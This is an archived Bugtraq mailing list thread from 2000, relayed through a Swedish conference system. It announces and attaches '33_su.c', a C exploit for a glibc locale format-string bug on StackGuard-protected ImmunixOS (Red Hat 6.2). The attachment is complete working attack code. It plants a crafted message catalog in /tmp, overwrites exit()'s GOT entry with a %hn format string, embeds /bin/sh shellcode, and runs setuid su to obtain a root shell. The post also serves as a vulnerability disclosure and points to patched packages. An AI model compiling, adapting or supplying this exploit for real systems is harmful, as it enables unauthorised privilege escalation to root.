linux, säkerhet

5491280 2000-09-20  08:54  /35 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12871>
Kommentar till text 5444805 av Brevbäraren (som är implementerad i) Python
Ärende: glibc/locale sploit for ImmunixOS
------------------------------------------------------------

I just developed the first publicly known sploit that bypases
StackGuard protection in real world. I decided to publish it as the
patch for glibc ImmunixOS is out. It's also the proof of concept
described about year ago in our (my and Bulba's) Phrack article
published in May this year.
[http://phrack.infonexus.com/search.phtml?view&article=p56-5]

The sploit is as simple as possible, it does not take any arguments
and produces shell with euid==0. All addresses are fixed (stack and
env).  The exploiting string overwrites exit() GOT entry and makes it
point to our shellcode (it's sufficient if the stack is executable)
just like we described it in phrack article long time ago :)

The exploit won't work if glibc is patched (ImmunixOS patched glibc can be
found at:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/
        glibc-2.1.3-21_StackGuard.i386.rpm
        glibc-devel-2.1.3-21_StackGuard.i386.rpm
        glibc-profile-2.1.3-21_StackGuard.i386.rpm
        nscd-2.1.3-21_StackGuard.i386.rpm).


I would like to remind that by using StackGuarded binaries you're
still adding extra security level that can be bypassed ONLY under
certain circumstances!

Greetings go to all best Polish security specialists!

Regards,

--
Mariusz Wo³oszyn
Internet Security Specialist, Internet Partners, GTS Poland
(5491280) ------------------------------------------(Ombruten)
Kommentar i text 5491281 av Brevbäraren (som är implementerad i) Python

5491281 2000-09-20  08:54  /83 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12872>
Kommentar till text 5491280 av Brevbäraren (som är implementerad i) Python
Ärende: Bilaga (33_su.c) till: glibc/locale sploit for ImmunixOS
------------------------------------------------------------
/* 33_su.c exploit for LC glibc format string bug
   it works on StackGuarded version of RH 6.2
   called ImmunixOS (http://www.immunix.org/)
   Exploit (c)Lam3rZ Group by Kil3r of Lam3rZ

   it's the first public sploit that bypases StackGuard protection in
   real world it is also a proof of concept described long time ago
   in Lam3rZ's Phrack article "BYPASSING STACKGUARD AND STACKSHIELD"
   by Bulba and Kil3r
   [http://phrack.infonexus.com/search.phtml?view&article=p56-5]


   greetz: warning3, scut, stealth, bulba, tmoggie, nises, wasik (aka
   synek ;), and teso team, LSD team, HERT, padnieta babcia, z33d,
   lcamtuf aka postawflaszke, clubbing.pl, Lucek Skajuoker (wracaj do
   zdrowia!).

   Special greets go to Crispin Cowan

   Disclaimer: THIS is Lam3rZ style (famouce one). Lam3rz style DO
   NOT exploit bash, do not use bash and does nothing to do with bash
   scripts!  Lam3rZ sploits do not like to take any arguments it
   confuses lamers!


   qwertz ?
   zes !

*/
// lamer:
// compile it as a regular user on a box and it should work! :)

// lam3r:
// read the code carefully and have a fun! :)


#include <stdio.h>

#define EXIT_GOT      	0x804c624
#define WHERESHELLCODE  0xbfffff81

#define ENV             "LANGUAGE=fi_FI/../../../../../../tmp"
#define PATH             "/tmp/LC_MESSAGES"



char *env[11];
char code[]=
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char
hacker[]="\x24\xc6\x04\x08\x89\x89\x89\x89\x25\xc6\x04\x08\x89\x89\x89\x89\x26\xc6\x04\x08\x89\x89\x89\x89\x27\xc6\x04\x08\x44\x44\x44";

main () {
char buf[1024];
FILE *fp;

if(mkdir(PATH,0755) < 0)
{
perror("mkdir");
}
chdir(PATH);
if( !(fp = fopen("libc.po", "w+")))
{
perror("fopen");
exit(1);
}

strcpy(buf,"%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%dAAAA%226d%hn%126d%hn%256d%hn%192d%hn");

fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", buf);
fclose(fp);


system("/usr/bin/msgfmt libc.po -o libc.mo");
env[1]=ENV;
env[0]=code;
env[2]=hacker;
env[3]=NULL;
printf("ZAJEBI¦CIE!!!\nA teraz bêdziesz le¿a³ i tañczy³ r±czk±!\n");
execle("/bin/su","su","-u", NULL,env);
}
(5491281) ------------------------------------------(Ombruten)